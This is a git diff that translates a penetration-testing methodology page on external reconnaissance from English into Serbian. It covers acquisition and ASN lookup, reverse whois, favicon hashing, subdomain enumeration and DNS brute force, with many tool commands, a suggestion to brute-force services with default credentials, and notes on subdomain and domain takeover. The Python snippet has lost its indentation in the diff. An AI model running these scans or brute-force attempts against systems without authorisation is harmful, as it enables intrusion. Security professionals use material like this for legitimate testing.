+1. Pronaći akvizicije glavne kompanije, što će nam dati kompanije unutar opsega.
+2. Pronaći ASN (ako postoji) svake kompanije, što će nam dati IP opsege koje poseduje svaka kompanija.
+3. Koristiti obrnute whois pretrage da tražimo druge unose (imena organizacija, domene...) povezane sa prvim (ovo se može raditi rekurzivno).
+4. Koristiti druge tehnike kao što su shodan `org` i `ssl` filteri da tražimo druge imovine (trik sa `ssl` se može raditi rekurzivno).
 
-The goal of this phase is to obtain all the **companies owned by the main company** and then all the **assets** of these companies. To do so, we are going to:
+### **Akvizicije**
 
-1. Find the acquisitions of the main company, this will give us the companies inside the scope.
-2. Find the ASN (if any) of each company, this will give us the IP ranges owned by each company
-3. Use reverse whois lookups to search for other entries (organisation names, domains...) related to the first one (this can be done recursively)
-4. Use other techniques like shodan `org`and `ssl`filters to search for other assets (the `ssl` trick can be done recursively).
+Prvo, treba da znamo koje **druge kompanije poseduje glavna kompanija**.\
+Jedna opcija je da posetite [https://www.crunchbase.com/](https://www.crunchbase.com), **pretražite** **glavnu kompaniju**, i **kliknite** na "**akvizicije**". Tamo ćete videti druge kompanije koje je glavna kompanija akvizirala.\
+Druga opcija je da posetite **Wikipedia** stranicu glavne kompanije i potražite **akvizicije**.
 
-### **Acquisitions**
+> U redu, u ovom trenutku trebali biste znati sve kompanije unutar opsega. Hajde da saznamo kako da pronađemo njihovu imovinu.
 
-First of all, we need to know which **other companies are owned by the main company**.\
-One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.\
-Other option is to visit the **Wikipedia** page of the main company and search for **acquisitions**.
+### **ASNovi**
 
-> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets.
-
-### **ASNs**
-
-An autonomous system number (**ASN**) is a **unique number** assigned to an **autonomous system** (AS) by the **Internet Assigned Numbers Authority (IANA)**.\
-An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
-
-It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs.\
-You can **search** by company **name**, by **IP** or by **domain** in [**https://bgp.he.net/**](https://bgp.he.net)**.**\
-**Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net) **(Africa),** [**Arin**](https://www.arin.net/about/welcome/region/)**(North America),** [**APNIC**](https://www.apnic.net) **(Asia),** [**LACNIC**](https://www.lacnic.net) **(Latin America),** [**RIPE NCC**](https://www.ripe.net) **(Europe). Anyway, probably all the** useful information **(IP ranges and Whois)** appears already in the first link.
+Broj autonomnog sistema (**ASN**) je **jedinstveni broj** dodeljen **autonomnom sistemu** (AS) od strane **Internet Assigned Numbers Authority (IANA)**.\
+**AS** se sastoji od **blokova** **IP adresa** koje imaju jasno definisanu politiku za pristup spoljnim mrežama i kojima upravlja jedna organizacija, ali se mogu sastojati od više operatera.
 
+Zanimljivo je saznati da li je **kompanija dodelila neki ASN** da bi pronašla svoje **IP opsege.** Bilo bi zanimljivo izvršiti **test ranjivosti** protiv svih **hostova** unutar **opsega** i **tražiti domene** unutar ovih IP adresa.\
+Možete **pretraživati** po imenu kompanije, po **IP-u** ili po **domenu** na [**https://bgp.he.net/**](https://bgp.he.net)**.**\
+**U zavisnosti od regiona kompanije, ovi linkovi bi mogli biti korisni za prikupljanje dodatnih podataka:** [**AFRINIC**](https://www.afrinic.net) **(Afrika),** [**Arin**](https://www.arin.net/about/welcome/region/)**(Severna Amerika),** [**APNIC**](https://www.apnic.net) **(Azija),** [**LACNIC**](https://www.lacnic.net) **(Latinska Amerika),** [**RIPE NCC**](https://www.ripe.net) **(Evropa). U svakom slučaju, verovatno su sve** korisne informacije **(IP opsezi i Whois)** već prikazane u prvom linku.
 ```bash
 #You can try "automate" this with amass, but it's not very recommended
 amass intel -org tesla
 amass intel -asn 8911,50313,394161
 ```
-
-Also, [**BBOT**](https://github.com/blacklanternsecurity/bbot)**'s** subdomain enumeration automatically aggregates and summarizes ASNs at the end of the scan.
-
+Takođe, [**BBOT**](https://github.com/blacklanternsecurity/bbot)**'s** enumeracija poddomena automatski agregira i sumira ASN-ove na kraju skeniranja.
 ```bash
 bbot -t tesla.com -f subdomain-enum
 ...
@@ -60,62 +52,59 @@ bbot -t tesla.com -f subdomain-enum
 [INFO] bbot.modules.asn: +----------+---------------------+--------------+----------------+----------------------------+-----------+
 
 ```
+Možete pronaći IP opsege organizacije takođe koristeći [http://asnlookup.com/](http://asnlookup.com) (ima besplatan API).\
+Možete pronaći IP i ASN domena koristeći [http://ipv4info.com/](http://ipv4info.com).
 
-You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com) (it has free API).\
-You can find the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com).
+### **Traženje ranjivosti**
 
-### **Looking for vulnerabilities**
+U ovom trenutku znamo **sve resurse unutar opsega**, tako da, ako vam je dozvoljeno, možete pokrenuti neki **skener ranjivosti** (Nessus, OpenVAS) na svim hostovima.\
+Takođe, možete pokrenuti neke [**port skenove**](../pentesting-network/#discovering-hosts-from-the-outside) **ili koristiti usluge kao što je** shodan **da pronađete** otvorene portove **i u zavisnosti od onoga što pronađete, trebali biste** pogledati u ovu knjigu kako da pentestujete nekoliko mogućih usluga koje se izvode.\
+**Takođe, vredi napomenuti da možete pripremiti neke** liste podrazumevanih korisničkih imena **i** lozinki **i pokušati da** bruteforce-ujete usluge sa [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
 
-At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\
-Also, you could launch some [**port scans**](../pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\
-**Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
+## Domeni
 
-## Domains
+> Znamo sve kompanije unutar opsega i njihove resurse, vreme je da pronađemo domene unutar opsega.
 
-> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope.
+_Molimo vas, imajte na umu da u sledećim predloženim tehnikama možete takođe pronaći poddomene i da te informacije ne bi trebale biti potcenjene._
 
-_Please, note that in the following purposed techniques you can also find subdomains and that information shouldn't be underrated._
+Prvo, trebali biste potražiti **glavnu domenu**(e) svake kompanije. Na primer, za _Tesla Inc._ to će biti _tesla.com_.
 
-First of all you should look for the **main domain**(s) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_.
-
-### **Reverse DNS**
-
-As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server (1.1.1.1, 8.8.8.8)
+### **Obrnuti DNS**
 
+Pošto ste pronašli sve IP opsege domena, mogli biste pokušati da izvršite **obrnute dns pretrage** na tim **IP-ovima kako biste pronašli više domena unutar opsega**. Pokušajte da koristite neki DNS server žrtve ili neki poznati DNS server (1.1.1.1, 8.8.8.8)
 ```bash
 dnsrecon -r  -n    #DNS reverse of all of the addresses
 dnsrecon -d facebook.com -r 157.240.221.35/24 #Using facebooks dns
 dnsrecon -r 157.240.221.35/24 -n 1.1.1.1 #Using cloudflares dns
 dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns
 ```
+Da bi ovo funkcionisalo, administrator mora ručno da omogući PTR.\
+Takođe možete koristiti online alat za ove informacije: [http://ptrarchive.com/](http://ptrarchive.com)
 
-For this to work, the administrator has to enable manually the PTR.\
-You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com)
+### **Obrnuti Whois (loop)**
 
-### **Reverse Whois (loop)**
+Unutar **whois** možete pronaći mnogo zanimljivih **informacija** kao što su **ime organizacije**, **adresa**, **emailovi**, brojevi telefona... Ali ono što je još zanimljivije je da možete pronaći **više sredstava povezanih sa kompanijom** ako izvršite **obrnute whois pretrage po bilo kojem od tih polja** (na primer, druge whois registre gde se isti email pojavljuje).\
+Možete koristiti online alate kao što su:
 
-Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** (for example other whois registries where the same email appears).\
-You can use online tools like:
+- [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Besplatno**
+- [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Besplatno**
+- [https://www.reversewhois.io/](https://www.reversewhois.io) - **Besplatno**
+- [https://www.whoxy.com/](https://www.whoxy.com) - **Besplatno** web, nije besplatno API.
+- [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com) - Nije besplatno
+- [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Nije besplatno (samo **100 besplatnih** pretraga)
+- [https://www.domainiq.com/](https://www.domainiq.com) - Nije besplatno
 
-- [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Free**
-- [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Free**
-- [https://www.reversewhois.io/](https://www.reversewhois.io) - **Free**
-- [https://www.whoxy.com/](https://www.whoxy.com) - **Free** web, not free API.
-- [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com) - Not free
-- [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Not Free (only **100 free** searches)
-- [https://www.domainiq.com/](https://www.domainiq.com) - Not Free
+Možete automatizovati ovaj zadatak koristeći [**DomLink** ](https://github.com/vysecurity/DomLink)(zahteva whoxy API ključ).\
+Takođe možete izvršiti neku automatsku obrnutu whois otkrivanje sa [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois`
 
-You can automate this task using [**DomLink** ](https://github.com/vysecurity/DomLink)(requires a whoxy API key).\
-You can also perform some automatic reverse whois discovery with [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois`
-
-**Note that you can use this technique to discover more domain names every time you find a new domain.**
+**Imajte na umu da možete koristiti ovu tehniku da otkrijete više imena domena svaki put kada pronađete novi domen.**
 
 ### **Trackers**
 
-If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.\
-For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages.
+Ako pronađete **isti ID istog trackera** na 2 različite stranice, možete pretpostaviti da su **obe stranice** **upravlja iste ekipe**.\
+Na primer, ako vidite isti **Google Analytics ID** ili isti **Adsense ID** na nekoliko stranica.
 
-There are some pages and tools that let you search by these trackers and more:
+Postoje neke stranice i alati koji vam omogućavaju da pretražujete po ovim trackerima i još:
 
 - [**Udon**](https://github.com/dhn/udon)
 - [**BuiltWith**](https://builtwith.com)
@@ -125,113 +114,99 @@ There are some pages and tools that let you search by these trackers and more:
 
 ### **Favicon**
 
-Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Here’s how to use it:
-
+Da li ste znali da možemo pronaći povezane domene i poddomene našeg cilja tražeći isti hash favicon ikone? Ovo je upravo ono što alat [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) koji je napravio [@m4ll0k2](https://twitter.com/m4ll0k2) radi. Evo kako ga koristiti:
 ```bash
 cat my_targets.txt | xargs -I %% bash -c 'echo "http://%%/favicon.ico"' > targets.txt
 python3 favihash.py -f https://target/favicon.ico -t targets.txt -s
 ```
+![favihash - otkrijte domene sa istim favicon ikonom hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg)
 
-![favihash - discover domains with the same favicon icon hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg)
-
-Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target.
-
-Moreover, you can also search technologies using the favicon hash as explained in [**this blog post**](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139). That means that if you know the **hash of the favicon of a vulnerable version of a web tech** you can search if in shodan and **find more vulnerable places**:
+Jednostavno rečeno, favihash će nam omogućiti da otkrijemo domene koje imaju isti favicon ikonu hash kao naš cilj.
 
+Štaviše, možete takođe pretraživati tehnologije koristeći favicon hash kao što je objašnjeno u [**ovom blog postu**](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139). To znači da ako znate **hash favicon-a ranjive verzije web tehnologije** možete pretraživati u shodan-u i **pronaći više ranjivih mesta**:
 ```bash
 shodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,port --separator " " | awk '{print $1":"$2}'
 ```
-
-This is how you can **calculate the favicon hash** of a web:
-
+Ovako možete **izračunati favicon hash** veba:
 ```python
 import mmh3
 import requests
 import codecs
 
 def fav_hash(url):
-    response = requests.get(url)
-    favicon = codecs.encode(response.content,"base64")
-    fhash = mmh3.hash(favicon)
-    print(f"{url} : {fhash}")
-    return fhash
+response = requests.get(url)
+favicon = codecs.encode(response.content,"base64")
+fhash = mmh3.hash(favicon)
+print(f"{url} : {fhash}")
+return fhash
 ```
-
 ### **Copyright / Uniq string**
 
-Search inside the web pages **strings that could be shared across different webs in the same organisation**. The **copyright string** could be a good example. Then search for that string in **google**, in other **browsers** or even in **shodan**: `shodan search http.html:"Copyright string"`
+Pretražujte unutar web stranica **nizove koji se mogu deliti između različitih webova u istoj organizaciji**. **Copyright string** može biti dobar primer. Zatim pretražujte taj niz u **google-u**, u drugim **pregledačima** ili čak u **shodan-u**: `shodan search http.html:"Copyright string"`
 
 ### **CRT Time**
 
-It's common to have a cron job such as
-
+Uobičajeno je imati cron job kao
 ```bash
 # /etc/crontab
 37 13 */10 * * certbot renew --post-hook "systemctl reload nginx"
 ```
+da obnovite sve sertifikate domena na serveru. To znači da čak i ako CA koja se koristi za ovo ne postavi vreme kada je generisan u vremenu važenja, moguće je **pronaći domene koje pripadaju istoj kompaniji u logovima transparentnosti sertifikata**.\
+Pogledajte ovaj [**izveštaj za više informacija**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/).
 
-to renew the all the domain certificates on the server. This means that even if the CA used for this doesn't set the time it was generated in the Validity time, it's possible to **find domains belonging to the same company in the certificate transparency logs**.\
-Check out this [**writeup for more information**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/).
+### Mail DMARC informacije
 
-### Mail DMARC information
+Možete koristiti veb sajt kao što je [https://dmarc.live/info/google.com](https://dmarc.live/info/google.com) ili alat kao što je [https://github.com/Tedixx/dmarc-subdomains](https://github.com/Tedixx/dmarc-subdomains) da pronađete **domene i poddomene koje dele iste DMARC informacije**.
 
-You can use a web such as [https://dmarc.live/info/google.com](https://dmarc.live/info/google.com) or a tool such as [https://github.com/Tedixx/dmarc-subdomains](https://github.com/Tedixx/dmarc-subdomains) to find **domains and subdomain sharing the same dmarc information**.
+### **Pasivno preuzimanje**
 
-### **Passive Takeover**
+Očigledno je uobičajeno da ljudi dodeljuju poddomene IP-ovima koji pripadaju provajderima u oblaku i u nekom trenutku **izgube tu IP adresu, ali zaborave da uklone DNS zapis**. Stoga, samo **pokretanjem VM-a** u oblaku (kao što je Digital Ocean) zapravo ćete **preuzeti neke poddomene**.
 
-Apparently is common for people to assign subdomains to IPs that belongs to cloud providers and at some point **lose that IP address but forget about removing the DNS record**. Therefore, just **spawning a VM** in a cloud (like Digital Ocean) you will be actually **taking over some subdomains(s)**.
+[**Ova objava**](https://kmsec.uk/blog/passive-takeover/) objašnjava priču o tome i predlaže skriptu koja **pokreće VM u DigitalOcean-u**, **dobija** **IPv4** nove mašine i **pretražuje u Virustotal-u za zapise poddomena** koji upućuju na nju.
 
-[**This post**](https://kmsec.uk/blog/passive-takeover/) explains a store about it and propose a script that **spawns a VM in DigitalOcean**, **gets** the **IPv4** of the new machine, and **searches in Virustotal for subdomain records** pointing to it.
+### **Ostali načini**
 
-### **Other ways**
-
-**Note that you can use this technique to discover more domain names every time you find a new domain.**
+**Napomena da možete koristiti ovu tehniku da otkrijete više imena domena svaki put kada pronađete novu domenu.**
 
 **Shodan**
 
-As you already know the name of the organisation owning the IP space. You can search by that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate.
+Kao što već znate ime organizacije koja poseduje IP prostor. Možete pretraživati po tim podacima u Shodanu koristeći: `org:"Tesla, Inc."` Proverite pronađene hostove za nove neočekivane domene u TLS sertifikatu.
 
-You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter : `ssl:"Tesla Motors"` or use a tool like [**sslsearch**](https://github.com/HarshVaragiya/sslsearch).
+Možete pristupiti **TLS sertifikatu** glavne veb stranice, dobiti **ime organizacije** i zatim pretraživati to ime unutar **TLS sertifikata** svih veb stranica poznatih u **Shodanu** sa filtrima: `ssl:"Tesla Motors"` ili koristiti alat kao što je [**sslsearch**](https://github.com/HarshVaragiya/sslsearch).
 
 **Assetfinder**
 
-[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing.
+[**Assetfinder**](https://github.com/tomnomnom/assetfinder) je alat koji traži **domene povezane** sa glavnom domenom i **poddomenama** njih, prilično neverovatno.
 
-### **Looking for vulnerabilities**
+### **Traženje ranjivosti**
 
-Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company.
+Proverite za neki [domain takeover](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Možda neka kompanija **koristi neku domenu** ali su **izgubili vlasništvo**. Samo je registrujte (ako je dovoljno jeftina) i obavestite kompaniju.
 
-If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
-&#xNAN;_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
+Ako pronađete neku **domenu sa IP-om koji se razlikuje** od onih koje ste već pronašli u otkrivanju sredstava, trebali biste izvršiti **osnovno skeniranje ranjivosti** (koristeći Nessus ili OpenVAS) i neko [**skeniranje portova**](../pentesting-network/#discovering-hosts-from-the-outside) sa **nmap/masscan/shodan**. U zavisnosti od toga koji servisi rade, možete pronaći u **ovoj knjizi neke trikove za "napad" na njih**.\
+&#xNAN;_Note da ponekad je domena hostovana unutar IP-a koji nije pod kontrolom klijenta, tako da nije u opsegu, budite oprezni._
 
-\
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
 
-{% embed url="https://go.intigriti.com/hacktricks" %}
 
-## Subdomains
+## Poddomene
 
-> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.
+> Znamo sve kompanije unutar opsega, sve resurse svake kompanije i sve domene povezane sa kompanijama.
 
-It's time to find all the possible subdomains of each found domain.
+Vreme je da pronađemo sve moguće poddomene svake pronađene domene.
 
 > [!TIP]
-> Note that some of the tools and techniques to find domains can also help to find subdomains
+> Napomena da neki od alata i tehnika za pronalaženje domena mogu takođe pomoći u pronalaženju poddomena
 
 ### **DNS**
 
-Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it).
-
+Pokušajmo da dobijemo **poddomene** iz **DNS** zapisa. Takođe bismo trebali pokušati za **Zone Transfer** (Ako je ranjiv, trebali biste to prijaviti).
 ```bash
 dnsrecon -a -d tesla.com
 ```
-
 ### **OSINT**
 
-The fastest way to obtain a lot of subdomains is search in external sources. The most used **tools** are the following ones (for better results configure the API keys):
+Najbrži način da se dobiju mnogi poddomeni je pretraga u spoljnim izvorima. Najčešće korišćeni **alati** su sledeći (za bolje rezultate konfigurišite API ključeve):
 
 - [**BBOT**](https://github.com/blacklanternsecurity/bbot)
-
 ```bash
 # subdomains
 bbot -t tesla.com -f subdomain-enum
@@ -242,108 +217,80 @@ bbot -t tesla.com -f subdomain-enum -rf passive
 # subdomains + port scan + web screenshots
 bbot -t tesla.com -f subdomain-enum -m naabu gowitness -n my_scan -o .
 ```
-
 - [**Amass**](https://github.com/OWASP/Amass)
-
 ```bash
 amass enum [-active] [-ip] -d tesla.com
 amass enum -d tesla.com | grep tesla.com # To just list subdomains
 ```
-
 - [**subfinder**](https://github.com/projectdiscovery/subfinder)
-
 ```bash
 # Subfinder, use -silent to only have subdomains in the output
 ./subfinder-linux-amd64 -d tesla.com [-silent]
 ```
-
 - [**findomain**](https://github.com/Edu4rdSHL/findomain/)
-
 ```bash
 # findomain, use -silent to only have subdomains in the output
 ./findomain-linux -t tesla.com [--quiet]
 ```
-
 - [**OneForAll**](https://github.com/shmilylty/OneForAll/tree/master/docs/en-us)
-
 ```bash
 python3 oneforall.py --target tesla.com [--dns False] [--req False] [--brute False] run
 ```
-
 - [**assetfinder**](https://github.com/tomnomnom/assetfinder)
-
 ```bash
 assetfinder --subs-only 
 ```
-
 - [**Sudomy**](https://github.com/Screetsec/Sudomy)
-
 ```bash
 # It requires that you create a sudomy.api file with API keys
 sudomy -d tesla.com
 ```
-
 - [**vita**](https://github.com/junnlikestea/vita)
-
 ```
 vita -d tesla.com
 ```
-
 - [**theHarvester**](https://github.com/laramies/theHarvester)
-
 ```bash
 theHarvester -d tesla.com -b "anubis, baidu, bing, binaryedge, bingapi, bufferoverun, censys, certspotter, crtsh, dnsdumpster, duckduckgo, fullhunt, github-code, google, hackertarget, hunter, intelx, linkedin, linkedin_links, n45ht, omnisint, otx, pentesttools, projectdiscovery, qwant, rapiddns, rocketreach, securityTrails, spyse, sublist3r, threatcrowd, threatminer, trello, twitter, urlscan, virustotal, yahoo, zoomeye"
 ```
+Postoje **drugi zanimljivi alati/API** koji, iako nisu direktno specijalizovani za pronalaženje poddomena, mogu biti korisni za pronalaženje poddomena, kao što su:
 
-There are **other interesting tools/APIs** that even if not directly specialised in finding subdomains could be useful to find subdomains, like:
-
-- [**Crobat**](https://github.com/cgboal/sonarsearch)**:** Uses the API [https://sonar.omnisint.io](https://sonar.omnisint.io) to obtain subdomains
-
+- [**Crobat**](https://github.com/cgboal/sonarsearch)**:** Koristi API [https://sonar.omnisint.io](https://sonar.omnisint.io) za dobijanje poddomena
 ```bash
 # Get list of subdomains in output from the API
 ## This is the API the crobat tool will use
 curl https://sonar.omnisint.io/subdomains/tesla.com | jq -r ".[]"
 ```
-
-- [**JLDC free API**](https://jldc.me/anubis/subdomains/google.com)
-
+- [**JLDC besplatan API**](https://jldc.me/anubis/subdomains/google.com)
 ```bash
 curl https://jldc.me/anubis/subdomains/tesla.com | jq -r ".[]"
 ```
-
-- [**RapidDNS**](https://rapiddns.io) free API
-
+- [**RapidDNS**](https://rapiddns.io) besplatni API
 ```bash
 # Get Domains from rapiddns free API
 rapiddns(){
- curl -s "https://rapiddns.io/subdomain/$1?full=1" \
-  | grep -oE "[\.a-zA-Z0-9-]+\.$1" \
-  | sort -u
+curl -s "https://rapiddns.io/subdomain/$1?full=1" \
+| grep -oE "[\.a-zA-Z0-9-]+\.$1" \
+| sort -u
 }
 rapiddns tesla.com
 ```
-
 - [**https://crt.sh/**](https://crt.sh)
-
 ```bash
 # Get Domains from crt free API
 crt(){
- curl -s "https://crt.sh/?q=%25.$1" \
-  | grep -oE "[\.a-zA-Z0-9-]+\.$1" \
-  | sort -u
+curl -s "https://crt.sh/?q=%25.$1" \
+| grep -oE "[\.a-zA-Z0-9-]+\.$1" \
+| sort -u
 }
 crt tesla.com
 ```
-
-- [**gau**](https://github.com/lc/gau)**:** fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain.
-
+- [**gau**](https://github.com/lc/gau)**:** preuzima poznate URL-ove iz AlienVault-ove Open Threat Exchange, Wayback Machine-a i Common Crawl-a za bilo koju datu domenu.
 ```bash
 # Get subdomains from GAUs found URLs
 gau --subs tesla.com | cut -d "/" -f 3 | sort -u
 ```
-
-- [**SubDomainizer**](https://github.com/nsonaniya2010/SubDomainizer) **&** [**subscraper**](https://github.com/Cillian-Collins/subscraper): They scrap the web looking for JS files and extract subdomains from there.
-
+- [**SubDomainizer**](https://github.com/nsonaniya2010/SubDomainizer) **&** [**subscraper**](https://github.com/Cillian-Collins/subscraper): Oni pretražuju web u potrazi za JS datotekama i izvode poddomene iz njih.
 ```bash
 # Get only subdomains from SubDomainizer
 python3 SubDomainizer.py -u https://tesla.com | grep tesla.com
@@ -351,42 +298,35 @@ python3 SubDomainizer.py -u https://tesla.com | grep tesla.com
 # Get only subdomains from subscraper, this already perform recursion over the found results
 python subscraper.py -u tesla.com | grep tesla.com | cut -d " " -f
 ```
-
 - [**Shodan**](https://www.shodan.io/)
-
 ```bash
 # Get info about the domain
 shodan domain 
 # Get other pages with links to subdomains
 shodan search "http.html:help.domain.com"
 ```
-
 - [**Censys subdomain finder**](https://github.com/christophetd/censys-subdomain-finder)
-
 ```bash
 export CENSYS_API_ID=...
 export CENSYS_API_SECRET=...
 python3 censys-subdomain-finder.py tesla.com
 ```
-
 - [**DomainTrail.py**](https://github.com/gatete/DomainTrail)
-
 ```bash
 python3 DomainTrail.py -d example.com
 ```
-
-- [**securitytrails.com**](https://securitytrails.com/) has a free API to search for subdomains and IP history
+- [**securitytrails.com**](https://securitytrails.com/) ima besplatan API za pretragu subdomena i istoriju IP adresa
 - [**chaos.projectdiscovery.io**](https://chaos.projectdiscovery.io/#/)
 
-This project offers for **free all the subdomains related to bug-bounty programs**. You can access this data also using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list)
+Ovaj projekat nudi **besplatno sve subdomene povezane sa bug-bounty programima**. Ove podatke možete pristupiti i koristeći [chaospy](https://github.com/dr-0x0x/chaospy) ili čak pristupiti opsegu koji koristi ovaj projekat [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list)
 
-You can find a **comparison** of many of these tools here: [https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off)
+Možete pronaći **uporedbu** mnogih od ovih alata ovde: [https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off)
 
 ### **DNS Brute force**
 
-Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names.
+Pokušajmo da pronađemo nove **subdomene** brute-forcing DNS servere koristeći moguće nazive subdomena.
 
-For this action you will need some **common subdomains wordlists like**:
+Za ovu akciju biće vam potrebne neke **uobičajene liste reči za subdomene kao što su**:
 
 - [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056)
 - [https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt](https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt)
@@ -394,118 +334,93 @@ For this action you will need some **common subdomains wordlists like**:
 - [https://github.com/pentester-io/commonspeak](https://github.com/pentester-io/commonspeak)
 - [https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS](https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS)
 
-And also IPs of good DNS resolvers. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them. Or you could use: [https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt)
+Takođe, IP adrese dobrih DNS resolvera. Da biste generisali listu pouzdanih DNS resolvera, možete preuzeti resolvere sa [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) i koristiti [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) da ih filtrirate. Ili možete koristiti: [https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt)
 
-The most recommended tools for DNS brute-force are:
-
-- [**massdns**](https://github.com/blechschmidt/massdns): This was the first tool that performed an effective DNS brute-force. It's very fast however it's prone to false positives.
+Najpreporučivaniji alati za DNS brute-force su:
 
+- [**massdns**](https://github.com/blechschmidt/massdns): Ovo je bio prvi alat koji je efikasno izvršavao DNS brute-force. Veoma je brz, međutim sklon je lažnim pozitivnim rezultatima.
 ```bash
 sed 's/$/.domain.com/' subdomains.txt > bf-subdomains.txt
 ./massdns -r resolvers.txt -w /tmp/results.txt bf-subdomains.txt
 grep -E "tesla.com. [0-9]+ IN A .+" /tmp/results.txt
 ```
-
-- [**gobuster**](https://github.com/OJ/gobuster): This one I think just uses 1 resolver
-
+- [**gobuster**](https://github.com/OJ/gobuster): Mislim da koristi samo 1 resolver.
 ```
 gobuster dns -d mysite.com -t 50 -w subdomains.txt
 ```
-
